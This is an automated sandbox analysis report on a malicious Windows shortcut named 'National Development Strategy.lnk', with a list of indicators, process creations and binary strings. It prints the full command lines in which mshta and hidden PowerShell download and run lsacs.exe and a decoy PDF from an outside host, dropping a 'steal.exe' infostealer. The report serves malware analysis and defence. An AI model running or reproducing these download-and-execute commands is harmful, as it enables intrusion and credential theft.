Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFBABAE08D5 3_2_00007FFBABAE08D5
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42BAC50 18_2_00007FF6A42BAC50
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42C05AC 18_2_00007FF6A42C05AC
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42B15A0 18_2_00007FF6A42B15A0
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42B2DA0 18_2_00007FF6A42B2DA0
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42C01DC 18_2_00007FF6A42C01DC
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42C7DDC 18_2_00007FF6A42C7DDC
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42B8DD0 18_2_00007FF6A42B8DD0
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42C6DB8 18_2_00007FF6A42C6DB8
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42B7A70 18_2_00007FF6A42B7A70
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42B7EB0 18_2_00007FF6A42B7EB0
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42CEE98 18_2_00007FF6A42CEE98
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42B4280 18_2_00007FF6A42B4280
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42B2280 18_2_00007FF6A42B2280
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42B3F30 18_2_00007FF6A42B3F30
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42C1728 18_2_00007FF6A42C1728
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42C3AFC 18_2_00007FF6A42C3AFC
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42C1B5C 18_2_00007FF6A42C1B5C
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42B2B90 18_2_00007FF6A42B2B90
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42CB3E0 18_2_00007FF6A42CB3E0
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42C03C4 18_2_00007FF6A42C03C4
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42B6430 18_2_00007FF6A42B6430
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42CB86C 18_2_00007FF6A42CB86C
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42C7438 18_2_00007FF6A42C7438
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42B20B0 18_2_00007FF6A42B20B0
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42B94A0 18_2_00007FF6A42B94A0
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42C109C 18_2_00007FF6A42C109C
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42C0D10 18_2_00007FF6A42C0D10
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42C6908 18_2_00007FF6A42C6908
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F64FBE0 19_2_00007FFC0F64FBE0
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F6C7B30 19_2_00007FFC0F6C7B30
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F662550 19_2_00007FFC0F662550
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F669FC0 19_2_00007FFC0F669FC0
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F6CFFB0 19_2_00007FFC0F6CFFB0
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F69EF90 19_2_00007FFC0F69EF90
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F64B050 19_2_00007FFC0F64B050
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F664020 19_2_00007FFC0F664020
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F6CEF50 19_2_00007FFC0F6CEF50
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F6B4F40 19_2_00007FFC0F6B4F40
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F66DF30 19_2_00007FFC0F66DF30
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F642E6C 19_2_00007FFC0F642E6C
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F6B5E60 19_2_00007FFC0F6B5E60
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F646E3E 19_2_00007FFC0F646E3E
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F6F5E20 19_2_00007FFC0F6F5E20
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F6A7E20 19_2_00007FFC0F6A7E20
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F68ACC0 19_2_00007FFC0F68ACC0
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F6F1BE0 19_2_00007FFC0F6F1BE0
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F69CBB0 19_2_00007FFC0F69CBB0
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F65CBA0 19_2_00007FFC0F65CBA0
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F6B6C60 19_2_00007FFC0F6B6C60
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F6EEC10 19_2_00007FFC0F6EEC10
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F671AC0 19_2_00007FFC0F671AC0
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F6B8AB0 19_2_00007FFC0F6B8AB0
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F678AA0 19_2_00007FFC0F678AA0
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F650A90 19_2_00007FFC0F650A90
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F6A9A80 19_2_00007FFC0F6A9A80
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F67DB40 19_2_00007FFC0F67DB40
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F6A69E0 19_2_00007FFC0F6A69E0
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F692A45 19_2_00007FFC0F692A45
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F6F3A30 19_2_00007FFC0F6F3A30
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F66F960 19_2_00007FFC0F66F960
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F684960 19_2_00007FFC0F684960
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F68D6B0 19_2_00007FFC0F68D6B0
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F6CE6A0 19_2_00007FFC0F6CE6A0
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F6AE680 19_2_00007FFC0F6AE680
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F649770 19_2_00007FFC0F649770
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F66E700 19_2_00007FFC0F66E700
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F6EF700 19_2_00007FFC0F6EF700
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F64F5D0 19_2_00007FFC0F64F5D0
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F668630 19_2_00007FFC0F668630
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F651620 19_2_00007FFC0F651620
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F655600 19_2_00007FFC0F655600
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F7064B0 19_2_00007FFC0F7064B0
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F643480 19_2_00007FFC0F643480
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F6B2570 19_2_00007FFC0F6B2570
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F694520 19_2_00007FFC0F694520
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F6AF380 19_2_00007FFC0F6AF380
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F6CD440 19_2_00007FFC0F6CD440
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F6DB440 19_2_00007FFC0F6DB440
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F6CB400 19_2_00007FFC0F6CB400
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F65D2E0 19_2_00007FFC0F65D2E0
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F66D2E0 19_2_00007FFC0F66D2E0
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F667370 19_2_00007FFC0F667370
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F659320 19_2_00007FFC0F659320
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F6F11B0 19_2_00007FFC0F6F11B0
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: String function: 00007FFC0F649030 appears 115 times
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: String function: 00007FFC0F64A300 appears 166 times
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_Salsa20.pyd B62C10757F14113D98F47ED750D4AD78C9B758037288D540CAB728EBE52A7B70
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_raw_aes.pyd 4525ABB5CEF21DF5459B037ACF288D5A8F947EE6F7BDE63A7D296B59261396FE
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_raw_aesni.pyd B1AFC84C800CF03D9B5C76D0C3CA3CFCBFEDEC21351105D093A7EFA632BB286B
Source: National Development Strategy.lnk ReversingLabs: Detection: 26%
Source: National Development Strategy.lnk Virustotal: Detection: 29%
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://cloud.archive-downloader.com/s.hta
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command Invoke-WebRequest -URI https://cloud.archive-downloader.com/file.pdf -OutFile 'c:\programdata\file.pdf'; c:\programdata\file.pdf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command Invoke-WebRequest -URI https://cloud.archive-downloader.com/lsacs.exe -OutFile 'c:\programdata\lsacs.exe'; c:\programdata\lsacs.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Remove-Item C:\Users\user\Downloads\Presidents_Strategy_2023.rar
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\programdata\file.pdf
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\ProgramData\lsacs.exe C:\programdata\lsacs.exe
Source: C:\ProgramData\lsacs.exe Process created: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe C:\programdata\lsacs.exe
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command Invoke-WebRequest -URI https://cloud.archive-downloader.com/file.pdf -OutFile 'c:\programdata\file.pdf'; c:\programdata\file.pdf Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command Invoke-WebRequest -URI https://cloud.archive-downloader.com/lsacs.exe -OutFile 'c:\programdata\lsacs.exe'; c:\programdata\lsacs.exe Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Remove-Item C:\Users\user\Downloads\Presidents_Strategy_2023.rar Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\programdata\file.pdf Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\ProgramData\lsacs.exe C:\programdata\lsacs.exe Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043 Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\lsacs.exe Process created: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe C:\programdata\lsacs.exe Jump to behavior
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32 Jump to behavior
Source: National Development Strategy.lnk LNK file: ..\..\..\..\Windows\System32\mshta.exe
Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dapxgbjs.b5j.ps1 Jump to behavior
Source: classification engine Classification label: mal100.rans.troj.spyw.winLNK@24/108@4/3
Source: C:\Windows\System32\mshta.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: steal.exe, 00000013.00000002.469271562.00007FFC0F771000.00000002.00000001.01000000.00000034.sdmp Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: steal.exe, steal.exe, 00000013.00000002.469271562.00007FFC0F771000.00000002.00000001.01000000.00000034.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: steal.exe, 00000013.00000002.469271562.00007FFC0F771000.00000002.00000001.01000000.00000034.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: steal.exe Binary or memory string: Insert thousands separators into a digit string. spec is a dictionary whose keys should include 'thousands_sep' and 'grouping'; typically it's the result of parsing the format specifier using _parse_format_specifier. The min_width keyword arg
Source: steal.exe, 00000013.00000002.469271562.00007FFC0F771000.00000002.00000001.01000000.00000034.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: steal.exe, 00000013.00000002.469271562.00007FFC0F771000.00000002.00000001.01000000.00000034.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: steal.exe, 00000013.00000002.469271562.00007FFC0F771000.00000002.00000001.01000000.00000034.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: steal.exe, 00000013.00000003.414480646.00000205617E9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42BAB30 GetProcessId,GenerateConsoleCtrlEvent,GetLastError,FormatMessageA,WaitForSingleObject,CloseHandle,SHFileOperationW, 18_2_00007FF6A42BAB30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5592:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4820:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5952:120:WilError_01
Source: steal.exe String found in binary or memory: The name of the reverse DNS pointer for the IP address, e.g.: >>> ipaddress.ip_address("127.0.0.1").reverse_pointer '1.0.0.127.in-addr.arpa' >>> ipaddress.ip_address("2001:db8::1").reverse_pointer '1.0.0.0.0.0.0.
Source: steal.exe String found in binary or memory: .ibm.com/support/knowledgecenter/en/ssw_aix_61/com.ibm.aix.basetrf1/dlopen.htm https://www.ibm.com/support/knowledgecenter/en/ssw_aix_61/com.ibm.aix.basetrf1/load.htm AIX supports two styles for dlopen(): svr4 (System V Release 4) which is common on posix pla
Source: steal.exe String found in binary or memory: Fused multiply-add. Returns self*other+third with no rounding of the intermediate product self*other. self and other are multiplied together, with no rounding of the result. The third operand is then added to the result,
Source: steal.exe String found in binary or memory: address_list = (address *("," address)) / obs-addr-list obs-addr-list = *([CFWS] ",") address *("," [address / CFWS]) We depart from the formal grammar here by continuing to parse until the end of the input, assuming the input to be entirely
Source: steal.exe String found in binary or memory: s.mp64. AIX ABI compatibility is described as guaranteed at: https://www.ibm.com/ support/knowledgecenter/en/ssw_aix_72/install/binary_compatability.html For pep425 purposes the AIX platform tag becomes: "aix-{:1x}{:1d}{:02d}-{:04d}-{}".format
Source: steal.exe String found in binary or memory: ------ Idle _CS_IDLE None Request-started _CS_REQ_STARTED None Request-sent _CS_REQ_SENT None Unread-response _CS_IDLE <response_class> Req-started-unread-re
Source: steal.exe String found in binary or memory: | response.read() | putrequest() v v Idle Req-started-unread-response ______/| / | response.read() | | ( putheader() )* endheaders()
Source: steal.exe String found in binary or memory: v v Request-started Req-sent-unread-response | | response.read() v Request-sent This diagram presents the following rules: -
Source: steal.exe String found in binary or memory: ransitions: (null) | | HTTPConnection() v Idle | | putrequest() v Request-started | | ( putheader() )* endheaders() v Request-sent |\_____________________________ |
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: C:\A\31\b\bin\amd64\_lzma.pdbMM source: steal.exe, 00000013.00000002.477336224.00007FFC12F6D000.00000002.00000001.01000000.00000016.sdmp
Source: Binary string: C:\A\31\b\bin\amd64\_lzma.pdb source: steal.exe, 00000013.00000002.477336224.00007FFC12F6D000.00000002.00000001.01000000.00000016.sdmp
Source: Binary string: C:\A\31\b\bin\amd64\sqlite3.pdb source: steal.exe, 00000013.00000002.469271562.00007FFC0F771000.00000002.00000001.01000000.00000034.sdmp

Data Obfuscation
barindex
Suspicious powershell command line found
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command Invoke-WebRequest -URI https://cloud.archive-downloader.com/file.pdf -OutFile 'c:\programdata\file.pdf'; c:\programdata\file.pdf
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command Invoke-WebRequest -URI https://cloud.archive-downloader.com/lsacs.exe -OutFile 'c:\programdata\lsacs.exe'; c:\programdata\lsacs.exe
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command Invoke-WebRequest -URI https://cloud.archive-downloader.com/file.pdf -OutFile 'c:\programdata\file.pdf'; c:\programdata\file.pdf Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command Invoke-WebRequest -URI https://cloud.archive-downloader.com/lsacs.exe -OutFile 'c:\programdata\lsacs.exe'; c:\programdata\lsacs.exe Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFBABAA1634 pushad ; ret 1_2_00007FFBABAA1631
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFBABAA15DD pushad ; ret 1_2_00007FFBABAA1631
PE file contains sections with non-standard names
Source: lsacs.exe.3.dr Static PE information: section name: _RDATA
Source: steal.exe.18.dr Static PE information: section name: _RDATA
Source: libcrypto-1_1.dll.18.dr Static PE information: section name: .00cfg
Source: libssl-1_1.dll.18.dr Static PE information: section name: .00cfg
Source: vcruntime140.dll.18.dr Static PE information: section name: _RDATA

Persistence and Installation Behavior
barindex
Windows shortcut file (LNK) starts blacklisted processes
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Jump to behavior
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\lsacs.exe Jump to dropped file
Drops PE files
Source: C:\ProgramData\lsacs.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\libffi-7.dll Jump to dropped file
Source: C:\ProgramData\lsacs.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\pywintypes39.dll Jump to dropped file
Source: C:\ProgramData\lsacs.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\sqlite3.dll Jump to dropped file
Source: C:\ProgramData\lsacs.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\pyexpat.pyd Jump to dropped file
